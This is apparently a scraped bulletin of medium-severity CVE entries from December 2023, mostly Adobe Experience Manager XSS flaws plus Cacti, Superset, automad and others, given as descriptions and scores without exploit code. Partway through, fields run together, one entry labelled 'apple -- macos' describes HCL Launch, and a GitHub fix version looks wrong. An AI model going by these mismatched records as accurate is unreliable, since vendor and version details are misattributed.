adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48570
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48571
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48572
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48573
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48574
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48575
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48576
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48577
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48578
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48579
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48580
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48581
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48582
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48583
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48584
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48585
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48586
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48587
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48588
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48589
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48590
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48591
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48592
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48593
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48594
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48595
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48596
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48597
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48598
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48599
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48600
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48601
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48602
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48603
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48604
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48605
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48606
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48607
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48609
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48610
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48611
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48612
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48613
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48614
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48615
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48616
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48617
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48618
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48619
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48620
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48621
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48622
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-155.4CVE-2023-48623
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48624
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51457
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51458
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-205.4CVE-2023-51459
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51460
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51461
psirt@adobe.com
adobe -- experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.2023-12-205.4CVE-2023-51462
psirt@adobe.com
aiven-open -- journalpumpjournalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential information contained in the configuration if any. The problem has been patched in journalpump 2.5.0.2023-12-216.5CVE-2023-51390
security-advisories@github.com
ansible -- ansibleAn absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path.2023-12-186.3CVE-2023-5115
secalert@redhat.com
apache -- streamparkIn the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The SQL syntax is: `select * from table where jobName like '%jobName%'`. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.2023-12-154.9CVE-2023-30867
security@apache.org
apache -- supersetUncontrolled resource consumption can be triggered by an authenticated attacker who uploads a malicious ZIP to import database, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.2023-12-196.5CVE-2023-46104
security@apache.org
apache -- supersetA where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.2023-12-196.5CVE-2023-49736
security@apache.org
apple -- macosHCL Launch may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion.2023-12-215.3CVE-2023-45703
psirt@hcl.com
automad -- automadA vulnerability was found in automad up to 1.10.9. It has been declared as critical. This vulnerability affects the function import of the file FileController.php. The manipulation of the argument importUrl leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248686 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7037
cna@vuldb.com
automad -- automadA vulnerability was found in automad up to 1.10.9. It has been classified as problematic. This affects the function upload of the file FileCollectionController.php of the component Content Type Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-214.7CVE-2023-7036
cna@vuldb.com
automad -- automadA vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-214.3CVE-2023-7038
cna@vuldb.com
aveva -- edgeAn issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts' responses.2023-12-165.3CVE-2021-42794
cve@mitre.org
aws -- aws-sdk-phpAWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1.2023-12-226CVE-2023-51651
security-advisories@github.com
bazarr -- bazarrBazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols.2023-12-155.3CVE-2023-50266
security-advisories@github.com
beijing_baichuo -- s210A vulnerability classified as critical has been found in Beijing Baichuo S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688.2023-12-216.3CVE-2023-7039
cna@vuldb.com
bosch -- building_integration_system_video_engineImproper handling of malformed API answer packets sent to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability, an attacker has to replace an existing API server, e.g. through Man-in-the-Middle attacks.2023-12-185.9CVE-2023-35867
psirt@bosch.com
bosch -- cpp14_firmwareAn information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet.2023-12-185.3CVE-2022-41677
psirt@bosch.com
cacti -- cactiCacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). An earlier fix (CVE-2023-39360) can be bypassed, which leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is `graphs_new.php`. The impact of the vulnerability is execution of arbitrary JavaScript code in the attacked user's browser. This issue has been patched in version 1.2.26.2023-12-226.1CVE-2023-49086
security-advisories@github.com
cacti -- cactiCacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti.2023-12-226.1CVE-2023-49088
security-advisories@github.com
cacti -- cactiCacti is an open source operational monitoring and fault management framework. A reflected cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php`. When uploading an XML template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains the unfiltered XML template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available.2023-12-225.4CVE-2023-50250
security-advisories@github.com
clear -- clearml_serverCross-site Scripting (XSS) - Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (i.e. when a malicious party already has access to the internal network and to a user's ClearML login credentials).2023-12-185.4CVE-2023-6778
security@huntr.dev
clickhouse -- clickhouseClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. This vulnerability is an integer underflow resulting in crash due to stack buffer overflow in decompression of FPC codec. It can be triggered and exploited by an unauthenticated attacker. The vulnerability is very similar to CVE-2023-47118 with how the vulnerable function can be exploited.2023-12-215.9CVE-2023-48298
security-advisories@github.com
codelyfe -- stupid_simple_cmsA vulnerability, which was classified as critical, has been found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this issue is some unknown functionality of the file /file-manager/rename.php. The manipulation of the argument newName leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248690 is the identifier assigned to this vulnerability.2023-12-215.4CVE-2023-7041
cna@vuldb.com
codelyfe -- stupid_simple_cmsA vulnerability classified as problematic was found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this vulnerability is an unknown functionality of the file /file-manager/rename.php. The manipulation of the argument oldName leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248689 was assigned to this vulnerability.2023-12-214.3CVE-2023-7040
cna@vuldb.com
corveda -- phpsandboxA vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability.2023-12-194.3CVE-2014-125107
cna@vuldb.com
csharp -- cws_collaborative_development_platformSmartStar Software CWS is a web-based integration platform. It has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can't disrupt service or obtain sensitive information.2023-12-156.5CVE-2023-48374
twcert@cert.org.tw
dell -- cpg_biosDell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system.2023-12-226.7CVE-2023-39251
security_alert@emc.com
dell -- emc_networkerDell NetWorker Virtual Edition versions 19.8 and below contain the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure.2023-12-185.3CVE-2023-28053
security_alert@emc.com
dfir-iris -- iris-webIris is a web collaborative platform aiming to help incident responders share technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker needs to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available.2023-12-224.6CVE-2023-50712
security-advisories@github.com
dfirkuiper -- kuiperA vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability.2023-12-185.9CVE-2023-6908
cna@vuldb.com
efacec -- uc_500eAn attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application.2023-12-206.3CVE-2023-50703
ics-cert@hq.dhs.gov
efacec -- uc_500eAn attacker could create malicious requests to obtain sensitive information about the web server.2023-12-205.3CVE-2023-50705
ics-cert@hq.dhs.gov
efacec -- uc_500eAn attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users.2023-12-204.3CVE-2023-50704
ics-cert@hq.dhs.gov
efacec -- uc_500eA user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens.2023-12-204.1CVE-2023-50706
ics-cert@hq.dhs.gov
enterprise_server -- enterprise_serverImproper access control in all versions of GitHub Enterprise Server allows unauthorized users to view private repository names via the "Get a check run" API endpoint. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected GitHub Enterprise Server version 3.7.0 and above and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.0.2023-12-215.3CVE-2023-46646
product-cna@github.com
